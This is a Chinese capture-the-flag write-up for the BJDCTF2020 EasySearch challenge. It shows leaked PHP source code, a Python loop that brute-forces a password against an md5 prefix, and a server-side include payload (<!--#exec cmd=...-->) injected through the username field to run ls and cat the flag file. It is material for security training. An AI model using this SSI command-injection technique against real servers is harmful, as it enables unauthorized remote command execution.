[BJDCTF2020]EasySearch.md
首页长这样
为什么两个框框的placeholder都是username啊喂==
猜密码没猜中,快进到下一步
使用dirsearch扫目录
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
这个***不会是手残把墨水滴💾上造成的吧QwQ
先绕过第一个if
from hashlib import md5
i = 0
while True:
if md5(str(i).encode('utf-8')).hexdigest()[:6] == '6d0bc1':
print(i)
break
i = i + 1
2020666
接下来服务端在public目录下面写入了一个随机名字的shtml文件
[!] Header error ...暗示要去看响应头
然后是shtml的新知识
总之就是可以利用这个
<!--#exec cmd="ls -l" -->
来执行命令
这里通过username注入
ls
ls ..
cat ../flag_990c66bf85a09c664f0b6741840499b2
#Web #PHP #HTTP #Header #RCE #SHTML #HTML #目录扫描 #md5